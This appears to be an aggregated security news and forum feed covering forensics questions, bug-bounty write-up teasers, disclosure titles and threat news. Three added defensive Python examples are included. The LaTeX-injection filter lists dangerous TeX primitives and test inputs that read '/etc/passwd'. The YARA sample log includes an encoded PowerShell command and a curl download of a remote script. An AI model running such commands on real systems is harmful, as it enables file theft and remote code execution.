    Good morning, It’s time for a new 13Cubed episode! I'm sure you've seen hiberfil.sys on Windows systems for years. But, how much do you really know about Windows Hibernation? We'll start with the basics and look at the original concepts behind this technology. We'll then look at how it has changed throughout the evolution of Windows, and discuss the artifact's current forensic value as of today (the "Why should I care?" part). Lastly, we'll take a look at Hibernation Recon, one of the most capable tools available to help us parse these files. Episode: https://www.youtube.com/watch?v=Kbw1sDJb61g Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed submitted by /u/13Cubed [link] [comments]
    AccessData FTK Imager - Memory Capture Failed - Cannot Start Driver
    I am running a Windows 11 VM on Parallels on my MacBook Pro 14" M1 Pro and am trying to perform a memory capture with AccessData FTK Imager 4.7.1.2, and am receiving a "Could Not Start Driver" dialog box and "Memory Capture Failed" in the Memory Progress box. I tried the things below to resolve the problem but got the same outcome: - Ran AccessData FTK Imager as administrator - Disabled driver signature enforcement through a Windows admin cmd prompt - Disabled driver signature enforcement through the boot-up troubleshooting prompt - Enabled debug logging on FTK Imager, but the only thing that shows up is " [FTK Imager.cpp:271]: Imager logging initialized" after the memory capture fails. Nothing else populates the log. I tried this same thing on an old 2013 MacBook Pro i5 running a Windows 10 VM on Parallels and it works, so I am assuming it has to do with the ARM drivers on my machine. submitted by /u/joshmobillybo [link] [comments]

    Trends in Web Threats: Attackers Were More Active During Holiday Season
    We analyzed hundreds of thousands of incidents of malicious host URLs in order to identify recent trends in web threats, what they target and how. The post Trends in Web Threats: Attackers Were More Active During Holiday Season appeared first on Unit42.

    Process Injection using CreateRemoteThread API
    submitted by /u/tbhaxor [link] [comments]

    MIIT and four other ministries issue the "Guiding Opinions on Further Strengthening the Construction of Safety Systems at New Energy Vehicle Enterprises"
    The Opinions comprise 8 chapters and 22 articles; Chapter 7, "Improving the Cybersecurity Assurance System", focuses on strengthening cybersecurity protections.
    Hacker group NB65 attacks Russia with a modified version of the Conti ransomware
    According to reports, the hacker group NB65 has developed new ransomware by modifying the leaked Conti ransomware source code and is using it to attack Russia. Since the outbreak of the Russia-Ukraine war, the group has teamed up with the Anonymous hacker collective to attack several Russian targets, including the All-Russia State Television and Radio Broadcasting Company (VGTRK) and the Russian space agency Roscosmos. Since late March, NB65 has developed new ransomware from the leaked Conti source code and has gradually been using it against Russian entities to launch cyber…
    Anonymous, together with the Ukrainian IT Army, continues attacking Russian entities
    The Anonymous hacker group and the Ukrainian IT ARMY will continue launching cyberattacks against Russian government entities and private companies.
    Facebook blocked Russian and Belarusian cyberattacks targeting Ukraine
    Social-network giant Facebook (Meta) recently disclosed that Russia-linked attackers are trying to weaponize the social network against Ukraine.
    Hackers exploit the Spring4Shell vulnerability to deploy Mirai malware
    Security researchers have found that the Spring4Shell vulnerability is being heavily exploited by attackers to execute the Mirai malware and deploy botnets. In April 2022, Mirai malware began appearing in large numbers in the Singapore region.
    Posing as antivirus software, the SharkBot banking trojan spreads on Google Play
    Researchers from the CPR team found several malicious Android apps on Google Play masquerading as antivirus software and used to spread the SharkBot banking trojan.

    The Hacker Playbook 3: Is It Still Relevant?
    If you have read technical books on computer science, you will know that they have the disadvantage of becoming obsolete fairly quickly… Continue reading on Medium »

    NSFW. folders by year-month. random pics met-art ftv etc.
    submitted by /u/thats_dumberst [link] [comments]


    Exploiting BITB with advanced open redirect
    BITB, despite being old, is only being popularly known now, so I will briefly explain what it is, whoever knows, can jump from this to the… Continue reading on Medium »
    There’s $20 up for grabs in this post
    I have been hosting a challenge for my readers with a reward of $20. No one has claimed it yet, the prize is still up for grabs. Continue reading on Medium »
    Running Decentralized, and Community Oriented Bug Bounties
    Bug bounties are not a new thing, but web 3 has challenged security trends, expanding project’s needs, and creating a deep desire for… Continue reading on Medium »
    Exposing Thousands of Indian Railways Outlets’ private data.
    Don’t just use the features, try to exploit them. — Unknown Continue reading on Medium »
    Privacy Disclosure on Facebook Lite after Creating a Post
    Hello, Continue reading on Medium »
    Complete Guide To Start Bug Bounty In 2022
    Hey Everyone ! Today we learn how you can start your bug bounty journey and how you can make a successful bug bounty hunter ! Continue reading on InfoSec Write-ups »
    shonydanza-a-customizable-easy-to-navigate-tool-for-researching-pen-testing-and-defending-with-the-p…
    Continue reading on Medium »
    crawpy-yet-another-content-discovery-tool
    Yet another content discovery tool written in python. Continue reading on Medium »
    4-zero-3–403–401-bypass-methods-bash-automation
    >_ Introduction Continue reading on Medium »
    Wordlistgen — Quickly Generate Context-Specific Wordlists For Content Discovery From Lists Of URLs…
    wordlistgen is a tool to pass a list of URLs and get back a list of relevant words for your wordlists. Wordlists are much more effective… Continue reading on Medium »

    How does forcing the user to re-login every couple of hours help a web app's security?
    At work we have an internal web app. About every 2 hours the app will automatically log you out (even if you were using the app continuously, non-stop, during that period). I asked why so and the answer was: it is a policy forced by higher security authorities in the organization. All computers at work go to sleep in 10 minutes if not used and require entering the password. The question: how does forcing the user to re-login every so often help web app security? submitted by /u/esamcoding [link] [comments]
    List of protocols that are using TLS & their well known ports?
    I'm looking for (or trying to compile) a list of protocols that are using TLS (implicit, not via STARTTLS), including their well known ports. Like... https: 443 smtps (implicit): 465 imaps: 993 pop3s: 995 ldaps: 636 ftps (implicit): 990 telnet over TLS: 23 and 992 MS Global Catalog SSL 3269 What other protocols belong to this list? Edit: Adding new ports as they are being mentioned. submitted by /u/e_hyde [link] [comments]
    Is it possible to provide incorruptible integrity without authentication?
    Say I want to send a message and prove integrity without worrying about authentication or confidentiality. Is this theoretically possible? From my understanding authentication is sort of a by-product of most popular integrity schemes. I'm new to this so sorry if this is a super obvious question. EDIT: Better formulated: "is there a way to send a message over an insecure channel, where integrity is guaranteed but confidentiality or authentication are not". My understanding is no, since you'd have to encrypt the hash, which would require a symmetric or asymmetric key exchange, which would provide authentication. I understand now that the answer is definitely "no" submitted by /u/jacobjr23 [link] [comments]
    Readings Topic Recommendations Wanted
    Hey guys, I want some advice on a reading list of topics as a junior pentester. I've done a couple of certs, including the OSCP, but I feel that I need to learn the foundational knowledge of things like networks and services, so I can start strong. What topics do you guys feel that every pentester should know outside of a CTF-esque environment? Thanks in advance submitted by /u/lifeover9000 [link] [comments]
    Does anyone else find these Meterpreter sessions on their system?
    Hi, when I scan my PC with Antipwny this comes up. Can anyone confirm if their Chrome or NordVPN also has open Meterpreter sessions? Also, any tips on how to proceed with this? submitted by /u/Sudden-Pin-9480 [link] [comments]
    Phishing URL detection system?
    As my final year project I'm doing a phishing URL detection system using deep learning. I started it as research, and to provide a product I'm working on deploying the models using Flask (a simple web application), because I thought that when it comes to phishing attacks, URLs have a significant role to play. The first model was created using NLP (natural language processing), and to train it I used an LSTM. The second model was created using feature-based processing. I read some research papers and extracted simple features which I can work with (e.g. if the domain includes an '@' sign, that can be a phishing URL, so giving a value of '1' for those). The NLP-based model gave me around 97% accuracy and the feature-based model gave me around 88% accuracy. But when I try those models with new URLs (that I didn't use to train the models) they don't give me the results I expect. Is there any solution for that? Overall, I'm asking: is my project good enough? What are your ideas to improve it further? Any idea that you guys have will be helpful. Thank you <3 submitted by /u/lowiqstudent69 [link] [comments]
    Anyone have experience building a Windows AD lab environment in Docker?
    Goal The closest thing I've found to what I'm attempting is this stream. From the description: It is common for people to use spare hardware switches, routers, firewalls, and servers. For years, I used VMware workstation on desktops with multiple SSDs and lots of RAM so I could simulate a dozen VMs. But is there an easier way? Can we simulate hundreds of systems on a desktop. With Docker, I think we can. - cyberlibrarian However, this video was only a rough guide, as far as I can tell the code wasn't published, and only the early networking setup is covered. Context Our org doesn't provide the kind of lab we need so we've been trying to set up an AD testing environment on a hobbyist budget. And that's a low-end (enlisted / E4 pay) "hobbyist budget" not an "I make 6 figures" hobb…

    THM: Attacktive Directory
    In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing… Continue reading on InfoSec Write-ups »
    [HTB] Jerry — Walkthrough w/o Metasploit
    This time we are here to talk about Jerry, a retired and easy-to-solve machine on HTB, but one that can give us an understanding… Continue reading on Medium »

    Threat Actor Profile - FIN7
    submitted by /u/RandyMarsh_Lorde [link] [comments]

    War in Ukraine / April 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Useful and interesting webinars
    Continue reading on Medium »
    Good News Roundup: a KBJ-inspired Geek edition
    This week we celebrate Judge Ketanji Brown Jackson’s historic confirmation to the Supreme Court, OSINT wins for Ukraine, and more geek… Continue reading on Medium »
    SPY NEWS: 2022 — Week 14
    Summary of the espionage-related news stories for the Week 14 (3–9 April) of 2022. Continue reading on Medium »
    Use Android to hunt down Social Media accounts with SHERLOCK
    About — Sherlock, a powerful command line tool provided by Sherlock Project, can be used to find usernames across many social networks. It… Continue reading on Medium »
    OSINT With Buscador
    OSINT stands for Open Source Intelligence and is the practice of scraping the internet for publicly available information. This… Continue reading on Medium »

    SecWiki News 2022-04-10 Review
    No news updates today~ For more of the latest articles, visit SecWiki

    [Cullinan #31] Add Six, Update Two 🪴
    This is Cullinan log #31. There are quite a few changes this time. I added six new entries and added some content to the Path traversal and SSRF entries. There are many entries I am currently writing up or have spotted, so I will probably be updating this and that for a while. Add OAST; Add Threat Modeling; Add Log Injection; Add XSHM; Add LaTex Injection; Add Brute Force; Update Path Traversal #RCE with log poisoning; Update SSRF #Bypass with AAAA Record. Oh, and XSS… there is too much to organize in one go, so it will need a bit more time 😵‍💫

    Help understanding a small evtx file with 8 events.
    Hi community, I'm going through the EVTX ATTACK SAMPLES GitHub repo, and I chose a random one from the Lateral Movement category. I opened the file, which includes 8 events, and I can't really understand why this file would be considered suspicious (link is below). Is this because of the calc.exe? Or does it look like pass-the-hash attempts? (logon type 3/key length 0). If there is a resource that maybe explains the EVTX files in the repo, that would be great as a self-learning tool, but I could not find anything like that. Thanks in advance :) https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Lateral%20Movement/LM_WMI_4624_4688_TargetHost.evtx submitted by /u/HeliosHype [link] [comments]
    Forensically investigating docx files
    I'm looking at a docx sent to me by a rising star colleague in another team. Unlike what they've sent me in other cases, the docx has had its metadata scrubbed in Word (i.e. 0 minutes editing for a 3400 word document). However they've somehow neglected to remove authorship IDs. One of the ids is the colleague, the other is 'admin'. Is there any easy way to determine if the document has an origin outside our org? We do have a pretty good culture here, and I'd really prefer being able to have a diplomatic solution supported by evidence. If I can take some meaningful points for discussion about information sharing to the other team that would probably be ideal, but I don't want to do this without having something more concrete than suspicions. I've tried looking through it in Python with ZipFile and XML, as well as with docx, but it doesn't give me much more information that I could use. I've used regex to pull all weblinks, and there's nothing beyond internal links and the usual fare of links to MS and standards orgs. About the only thing is that it has some unusual fonts listed that I'd not expect to see in Australia, but are maybe a standard rollout? i.e. a Cherokee and an East Asian font of some sort. If anyone has suggestions that would be great. If not, I might just have to have a slower chat up the chain and stop sharing our strategy documents for now. submitted by /u/horror4802 [link] [comments]

    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on System Weakness »
    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on Medium »

    IBM's public FTP server with manuals and marketing material and posters etc.
    ftp.www.ibm.com submitted by /u/ShipGiftsToTurkey [link] [comments]


    The Journey to get “SQL Injection” at BluePay (BLUE Indonesia BluePay) — 2019
    Hello, In this article i want to share my experience getting SQL Injection on BluePay (BLUE Indonesia BluePay), I found this vulnerability… Continue reading on Medium »
    Android Pentesting Setup On Macbook M1
    Hello hackers, Continue reading on Medium »
    Subdomain Takeover and How the things evolved with Domain Verification
    It is possible that a successful execution of Subdomain Takeover will be critical in exploitation since an attacker will be able to carry… Continue reading on CodeX »
    Axelar Network's Bug Bounty Program
    Program overview Continue reading on Medium »
    Optimized DNS and HTTP Log Tool for pentesters
    eyes.sh 1.0.1 Continue reading on Medium »
    LayerZero Security Update — April 2022
    The past week showed us that nothing matters more than a commitment to continuously evaluate and improve security in this space… Continue reading on Medium »
  • Open

    [HTB] Legacy — Walkthrough w/o Metasploit
    Legacy is a retired HTB machine, and the first post on this page covers its solution. Continue reading on Medium »
    Office Multiple Search Order DLL Hijacking
    by: Tamir Yehuda(Tamirye94), Hai Vaknin(vakninhai), Noam Pomerantz, Hoshea Yarden, Ben Amar and Roy Kopit Continue reading on Medium »
  • Open

    Filipino OPM karaoke files?
    Is there a way to download OPM karaoke songs? I tried to search and download the whole magic sing archive but I could not find one. submitted by /u/Sabtreal23 [link] [comments]
  • Open

    Firewall analysis: A portable graph based approach
    submitted by /u/DiabloHorn [link] [comments]
    socialhunter: crawls the website and finds broken social media links that can be hijacked
    submitted by /u/utku1337 [link] [comments]
    Wrote about Azure AD Consent bypass - disclosure
    submitted by /u/jsantasalo [link] [comments]
  • Open

    Tools for Decoding MP3 Steganography
    Any recommended tools for decoding MP3 steganography that support Linux and macOS? submitted by /u/KnowledgeMammoth1714 [link] [comments]
    Why shouldn't I trust Google Password Manager and Microsoft/Edge Password Manager? Aren't they supposed to be some of the most secure given that they are made by those two giant companies?
    I honestly find these two to have the absolute best seamless syncing and integration across ALL platforms (Android, iOS, MacOS, Linux, Windows). They just work so well and it's painless. They do what they should without any unnecessary bells and whistles: manage passwords. What I love about Google Password Manager is that it lets you encrypt your passwords with a custom passphrase that won't be the same as your Google password. Edge lets you choose a device-specific passphrase that prompts you to enter before auto-filling anything. Controversies and all the discussion about privacy aside, I tend to trust companies like Google and Microsoft in terms of security. Given that they both have to deal with things like HIPAA and FedRAMP as part of their cloud service, I just can't doubt their expertise in having excellent security practices. So why wouldn't I trust a service like Google or Edge for managing my passwords if: (1) I have a 36+ character password on my account, (2) use YubiKey, (3) always enable device-specific extra password for Edge / enable encryption with custom passphrase in Google Password Manager. I am only interested in simply storing my passwords. I NEVER trust any service with my credit card info or bitcoin wallet seedphrase. I already use KeePass on an air-gapped device for storing such data and I never store the database anywhere online. submitted by /u/egobamyasi [link] [comments]
    Automatically onboarding/offboarding employees/contractors
    Not sure if anyone has similar issues. My team has been using quite a few SaaS tools in our daily work. Every time a new employee/contractor comes, I need to manually add them to every piece of software, and I need to remove them when they leave. I feel it is a waste of time to do it manually, and it is possible I might miss some. Has anyone come across automation tools or scripts to make it less manual? submitted by /u/Calm_Scene [link] [comments]
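An added example, not from the post above: whatever tool or script does this, the core job is a set difference between the HR roster (desired state) and each tool's user export (observed state), with e-mail normalisation so that `Alice+ci@Example.com` in GitHub is the same person as `alice@example.com` in HR, and with service accounts excluded. The roster, the exports and the names below are constructed for the example; in practice each export comes from the tool's admin API or a CSV download.

```python
"""Reconcile the HR roster against the user list exported from each SaaS tool and
produce the per-app add/remove work list. Inputs are in-memory here; in practice
each app's list comes from its admin API or a CSV export."""


def norm(email):
    """Lower-case and drop a +tag so 'A.B+x@Example.com' and 'a.b@example.com' match."""
    local, _, domain = email.strip().lower().partition("@")
    return local.split("+", 1)[0] + "@" + domain


def reconcile(roster, app_users, service_accounts=frozenset()):
    """roster:    {email: {"active": bool, "apps": {app, ...}}}  desired state from HR
    app_users: {app: {email, ...}}                             observed state per tool
    Returns {app: {"add": [...], "remove": [...], "orphan": [...]}} where 'remove'
    lists leavers (or people HR says should not have the app) still provisioned and
    'orphan' lists accounts HR has never heard of, which need a human to look."""
    desired = {norm(e): set(p["apps"]) for e, p in roster.items() if p["active"]}
    known = {norm(e) for e in roster}
    svc = {norm(e) for e in service_accounts}
    plan = {}
    for app, users in app_users.items():
        have = {norm(u) for u in users} - svc
        should = {e for e, apps in desired.items() if app in apps}
        plan[app] = {
            "add": sorted(should - have),
            "remove": sorted((have - should) & known),
            "orphan": sorted(have - known),
        }
    return plan


# Constructed sample data (not real exports).
ROSTER = {
    "alice@example.com": {"active": True, "apps": {"slack", "github"}},
    "bob@example.com": {"active": False, "apps": {"slack"}},  # left last week
    "carol@example.com": {"active": True, "apps": {"slack"}},  # no GitHub entitlement
}
APP_USERS = {
    "slack": {"alice@example.com", "bob@example.com", "dave@example.com", "bot@example.com"},
    "github": {"Alice+ci@Example.com", "carol@example.com"},
}
SERVICE_ACCOUNTS = {"bot@example.com"}

if __name__ == "__main__":
    for app, work in reconcile(ROSTER, APP_USERS, SERVICE_ACCOUNTS).items():
        print(app, work)
```

The output is idempotent: running it again after the changes have been applied yields empty lists, which makes it safe to schedule and to diff between runs. Leavers are the finding that matters most for security, so they are kept separate from orphans rather than merged into one list.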
  • Open

    Insecure Storage of Sensitive Information on lonestarcell.com server
    MTN Group disclosed a bug submitted by muhnad: https://hackerone.com/reports/1482830
    HTML injection through Invite Teammate email
    SecurityScorecard disclosed a bug submitted by cryptoknight028: https://hackerone.com/reports/1482057
    Folder architecture and file sizes of private file drop shares can be obtained
    Nextcloud disclosed a bug submitted by shakierbellows: https://hackerone.com/reports/1337422 - Bounty: $500
    Found Origin IP's Lead To Access To kraden.com
    Kraden disclosed a bug submitted by 4bhin8v: https://hackerone.com/reports/1531183 - Bounty: $100
    Host Header Injection leads to Open Redirect and Content Spoofing or Text Injection.
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1444675 - Bounty: $300
  • Open

    A Detailed Guide on Responder (LLMNR Poisoning)
    Introduction Responder is a widely used tool in penetration test scenarios and can be used for lateral movement across the network by red teamers. The post A Detailed Guide on Responder (LLMNR Poisoning) appeared first on Hacking Articles.
  • Open

    OSI MODEL
    Full form of OSI. If you want to know the full form of OSI and learn about the OSI model, then you are at the right place. OSI full… Continue reading on Medium »
    War in Ukraine / April 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Find users of popular services by time and place…
    The following selection of services is designed to collect data about content (posts, photos, videos) posted at a specific point in time… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-09 Review
    No news updated today. For more recent articles, visit SecWiki
  • Open

    Brute Force
    🔍 Introduction A brute force attack generates repeated web requests from a given wordlist or character pattern in order to cause a security problem. The idea resembles fuzzing, but where fuzzing sends malformed data to provoke a fault in the service, brute force sends many well-formed values to find one that is accepted, as in an attack on a password. In cryptography it means trying every possible value to break a particular cipher. 🗡 Offensive techniques Testing method Brute force is usually tested with a brute-force tool or a fuzzer, or with a purpose-written script.
    Speeding up ZAP scans with Context Technology
    ZAP's Context (Scope) has an item called Technology, found under Context > Technology. Looking closer, it holds a list of technologies (database, language, OS and so on) with checkboxes, all checked by default. So what is it for? Just a place to note which technologies the service uses? Of course not. The Technology item is closely tied to the Active Scan. The code for the SQL Injection part of the Active Scan rules shows why: it contains argument values such as Tech.MySQL and Tech.MsSQL, and these are exactly what map an Active Scan rule to a Technology.
    LaTeX Injection
    🔍 Introduction LaTeX is a typesetting system that uses TeX syntax; injecting TeX syntax into a system that processes it, so that it performs actions the attacker wants, is called LaTeX injection. TeX is a syntax for easily entering and using specially formatted text such as mathematical formulas, and is widely used for writing documents on computers. The Wikipedia page on TeX syntax gives a rough idea of what it covers. Example 1 \frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx 🗡 Offensive techniques Detect It is most likely to be found in file conversion features.
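An added example, not from the post above: a pre-render screen for user-supplied TeX in a conversion feature. The denylist catches the obvious file and shell primitives and decodes TeX's `^^xx` hex notation so that `^^5cinput` is not missed, but it cannot see a control sequence rebuilt with `\csname` or `\catcode` tricks, which is why a maths-only endpoint should enforce the allowlist instead. Both macro lists are illustrative, not a complete inventory.

```python
"""Screen user-supplied TeX before a conversion job renders it. A denylist of
dangerous primitives catches the obvious payloads; the allowlist is what a
service that only needs maths should actually enforce."""
import re

# Primitives and macros that read or write files, run commands, or can be used
# to rebuild a forbidden control sequence at run time (illustrative list).
DANGEROUS = {"input", "include", "InputIfFileExists", "openin", "openout", "read",
             "write", "immediate", "catcode", "csname", "scantokens", "def", "edef",
             "let", "usepackage", "directlua", "lstinputlisting", "verbatiminput"}

# Macros a maths-only endpoint needs; " " is control space, i.e. '\ ' (illustrative).
MATH_ALLOW = {"frac", "sqrt", "int", "sum", "prod", "lim", "pi", "alpha", "beta", "theta",
              "left", "right", "cdot", "times", "infty", "partial", "mathbb", "mathrm",
              "text", "le", "ge", "ne", ",", ";", "!", " "}

# A control word (letters) or a control symbol (one non-letter) after a backslash.
CONTROL_SEQ = re.compile(r"\\([A-Za-z]+|[^A-Za-z])")


def decode_hats(tex):
    """Expand TeX's ^^xx notation (two lowercase hex digits), so that
    '^^5cinput' is seen as a backslash followed by 'input'."""
    return re.sub(r"\^\^([0-9a-f]{2})", lambda m: chr(int(m.group(1), 16)), tex)


def control_sequences(tex):
    """All control sequence names in the input, after ^^ decoding."""
    return [m.group(1) for m in CONTROL_SEQ.finditer(decode_hats(tex))]


def dangerous_hits(tex):
    """Denylist check: names from DANGEROUS that appear in the input, sorted."""
    return sorted({c for c in control_sequences(tex) if c in DANGEROUS})


def is_allowed_math(tex):
    """Allowlist check: every control sequence is a known maths macro and no ^^
    notation is present at all (decode_hats only handles the hex form)."""
    return "^^" not in tex and all(c in MATH_ALLOW for c in control_sequences(tex))


if __name__ == "__main__":
    for sample in (r"\frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx",
                   r"\immediate\write18{cat /etc/passwd}",
                   r"^^5cinput{/etc/passwd}",
                   r"\csname input\endcsname{/etc/passwd}"):
        print(sample, "->", dangerous_hits(sample), is_allowed_math(sample))
```

The last sample shows the limit of the denylist: `\csname input\endcsname` never contains the token `input` as a control sequence, so only the allowlist rejects it. The real control is on the engine: run it with `-no-shell-escape` so `\write18` is inert, and set `openin_any=p` and `openout_any=p` in texmf.cnf so `\input` and `\openout` cannot leave the job directory; the filter is defence in depth.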
  • Open

    GCFA examination
    I recently took the SANS FOR500 class and passed my GCFE at 86%. Next up is the FOR508 and GCFA exam. Reaching out to the community to see if anyone has some insight into how the 2 exams compare and if I should expect to put more into the GCFA exam than I had to with the GCFE, or if I index and study the same amount as it took me to pass the GCFE at 86%, do you think I'll be fine with the GCFA? I've seen some previous posts here indicating the GCFA is difficult. Thanks ahead of time for any pointers and feedback! Edit: before anyone points it out, I realize the content of the exam will be different; I'm just wanting to know if anyone has some experience with how they compare in terms of preparation and time commitment. Also, in case this helps, I'm not required by my job to have these certifications. I'm just fortunate enough to have been given the opportunity to take those courses and certifications and would rather pass them, although it isn't a requirement. submitted by /u/Ckn0wt [link] [comments]
  • Open

    Some .htaccess tricks for file upload
    .htaccess is a configuration file for web servers running Apache Web Server.
    Wireshark capture: analysing packet loss?
    If the captured pcap has dropped packets, it affects the final result of the security test.
  • Open

    New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns
    A new version of SolarMarker malware appears to upgrade evasion abilities and demonstrates that the infostealer and backdoor continues to evolve. The post New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns appeared first on Unit42.

  • Open

    Discord Group for Cybersecurity jobs.
    I made a Discord for people who are looking to build their careers into Cyber Security. https://discord.gg/tMwHKufn submitted by /u/Shazeb02 [link] [comments]
    Which vulnerability in ASUS routers was exploited to install the Cyclops Blink malware?
    So I've read the report by Trend Micro and the analysis by UK NCSC. They explain how it acts and becomes persistent, but nowhere can I read which vulnerability was exploited to actually install the malware in the first place. ASUS says in its statement: Please note that if you choose not to install this new firmware version then, to avoid any potential unwanted intrusion, we strongly recommend that you disable remote access from WAN and reset your router to its default settings. So one can only guess that there is/was an easily exploitable vulnerability in the remote access function? submitted by /u/ogiakul [link] [comments]
    Print full lines on match in Yara
    How can I have Yara print the full lines for any line found matching a Yara rule. By default it will only print the string found and not the full line the string was found in, and I don't see an option to do that. submitted by /u/ZappaBeefheart [link] [comments]
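An added example, not from the post above: yara itself has no option to print the surrounding line, but `yara -s` prints each string match as `0x<hex offset>:$<identifier>: <matched data>` under the `rule file` line, and that offset is enough to recover the full line from the scanned file. The log and the yara output below are constructed for the example (the rule `suspicious_cmd` with strings `$cmd` and `$url` is hypothetical); the offsets in the sample output are computed from the sample data so the two stay consistent.

```python
"""Map `yara -s` match offsets back to the full line of the scanned file.
`yara -s` prints, under each 'rule file' line, one line per string match in the
form '0x<hex offset>:$<identifier>: <matched data>'; this resolves the offset."""
import re

MATCH_LINE = re.compile(r"^0x([0-9a-fA-F]+):(\$\w+):")


def parse_yara_s(output):
    """(offset, identifier) for every string-match line in `yara -s` output."""
    return [(int(m.group(1), 16), m.group(2))
            for line in output.splitlines() if (m := MATCH_LINE.match(line))]


def line_at(data, offset):
    """Return (1-based line number, full line without its newline) holding byte `offset`."""
    if not 0 <= offset < len(data):
        raise ValueError("offset outside file")
    start = data.rfind(b"\n", 0, offset) + 1          # -1 + 1 == 0 on the first line
    end = data.find(b"\n", offset)
    end = len(data) if end == -1 else end             # last line may lack a newline
    return data.count(b"\n", 0, start) + 1, data[start:end].rstrip(b"\r")


def full_lines(data, yara_output):
    """[(identifier, line number, full line)] for each match, in output order."""
    return [(ident, *line_at(data, off)) for off, ident in parse_yara_s(yara_output)]


# Constructed sample: a small log (CRLF on one line on purpose) and the `yara -s`
# output a hypothetical rule with $cmd = "powershell -enc" and $url = "http://"
# would produce for it. Offsets are computed so the sample stays self-consistent.
SAMPLE = (b"2022-04-08 10:01:02 sshd[12]: Accepted publickey for alice\n"
          b"2022-04-08 10:01:09 cmd: powershell -enc SQBFAFgA\r\n"
          b"2022-04-08 10:01:10 curl http://198.51.100.7/a.ps1")
YARA_S = ("suspicious_cmd sample.log\n"
          "0x%x:$cmd: powershell -enc\n"
          "0x%x:$url: http://\n") % (SAMPLE.index(b"powershell"), SAMPLE.index(b"http://"))

if __name__ == "__main__":
    for ident, lineno, line in full_lines(SAMPLE, YARA_S):
        print("%s line %d: %s" % (ident, lineno, line.decode("utf-8", "replace")))
```

For a real run, feed it the file bytes and the captured stdout of `yara -s rules.yar file`; the line number is computed by counting newlines before the match, so it matches what `grep -n` would print for the same line.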
    Sysmon Tuning Help - Event ID 7 - Image Loaded
    I'm trying to wrap my head around logging for Event ID 7 - Image Loaded events - notoriously a noisy one, but obviously a lot of value there. Hoping someone out there has gotten pretty intimate with logging and tuning this particular ID. What approach have you taken towards tuning? There are just a ton of processes in the environment that are always loading .dlls all over the place, and I don't have a detailed understanding of the avenues for exploitation here. If I exclude an Image and ImageLoaded combination because it generates a lot of noise, what about that one time an adversary is able to swap in a malicious .dll for the one that is normally legitimate? Or is the idea to catch something loading an image from a location it does not normally load from? One suggestion from the logging cheat sheet is to consider only logging events where the image is unsigned, but you may miss an event where an adversary is able to load something that appears signed but is not. submitted by /u/IHadADreamIWasAMeme [link] [comments]
    20YOE Staff+ Software Engineer at a FAANG. Been interested in netsec since I was a kid. Should I switch? CAN I switch?
    I used to wardial. I used to "creatively" use VMBs to make free international phone calls. I ran a hacker BBS from '94 to '99. I went to my first DefCon before the year 2000. I phreaked. I wrote my first code at four years old on a computer with sixteen kilobytes of RAM and was cracking software when I was eleven (and was dumb enough to put my real name on the title screen...). I used to be an op on #hack and #2600. I've read every volume of TCP/IP Illustrated cover to cover and still remember what each bit does in an IPv4 datagram. I remember when the early issues of Phrack went out and there were so many copies being sent that it would routinely slow down mail delivery across the entire internet. Basically, I love this shit. At the same time, I get an utterly ridiculous amount of money …
    What would be the best certification to get first?
    I wanted to learn coding, so I started with HTML and CSS, and then I decided that cyber security was sounding really interesting, so I started learning Python. I am currently taking Angela Yu's 100 Days of Code course on Udemy. I was considering doing a cyber security bootcamp at a college nearby, but I heard that boot camps are kind of a waste of money. So I want to be able to get something on my resume to be able to get a job. It seems like certifications are the best way of doing that. I want to know which certification would be the best bang for the buck. Which certification would look really good on an application that is also not too complicated for beginners? submitted by /u/bluntsmoker_420 [link] [comments]
    Getting into scripting Zeek vs Python
    I'm trying to get more insight into scripting for networking security purposes. Does anyone have a preference of using zeek vs python? Should I learn python before zeek? Is there anything more beneficial of using one language vs the other? Thanks! submitted by /u/alkior70 [link] [comments]
  • Open

    CarPunk: the car hacking toolkit
    CarPunk is very similar to CANghost; the only difference is that it comes with options to enable or disable the interface and basic sniffing, as… Continue reading on Medium »
    Scrummage — The Ultimate OSINT And Threat Hunting Framework
    VERSION 3.6 Continue reading on Medium »
    Smersh: a pentest-oriented collaborative tool used to track the progress of your company's missions
    Smersh is a pentest-oriented collaborative tool used to track the progress of your company's missions and generate reports. Preview front… Continue reading on Medium »
    AF-ShellHunter: auto shell lookup
    AF-ShellHunter: Auto shell lookup Continue reading on Medium »
  • Open

    Exploiting a Use-After-Free on PHP to bypass disable_functions
    submitted by /u/gid0rah [link] [comments]
    Microsoft Trusts the Client! Simple Bypass for the Defender for Cloud Apps Proxy
    submitted by /u/BugroSoft [link] [comments]
    Russia’s certificate authority for sanctioned organizations
    submitted by /u/koenrh [link] [comments]
    ImpressCMS: from unauthenticated SQL injection to RCE
    submitted by /u/eg1x [link] [comments]
    Exploiting CVE-2022-0778, a bug in OpenSSL vis-à-vis WebRTC platforms
    submitted by /u/EnableSecurity [link] [comments]
  • Open

    Ukraine — Situation update, 9 April
    The last 24 hours Continue reading on Medium »
    MY EXPERIENCE AS A JUDGE ON TRACELABS CTF SEARCH PARTY 2022
    This was my first year being a judge in the Tracelabs CTF search party competition. To be able to fully judge the submissions that came in… Continue reading on Medium »
    War in Ukraine / April 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Helping the investigative reporter…
    Save is an easy-to-use app designed to help you store, share and enhance your mobile media while protecting your identity. for iOS… Continue reading on Medium »
    My cryptocurrency investigation toolkit…
    Hello! I tried to collect most of the sources in one collection, ranging from blockchain explorers, universal explorers (allowing you to… Continue reading on Medium »
  • Open

    [Security Advisory] VMware patches multiple Workspace ONE Access vulnerabilities...
    VMware recently released patches for multiple vulnerabilities in Workspace ONE Access (formerly VMware Identity Manager), including a server-side template injection leading to remote command execution (C...
  • Open

    Using browser APIs a little more safely with the Permissions-Policy header
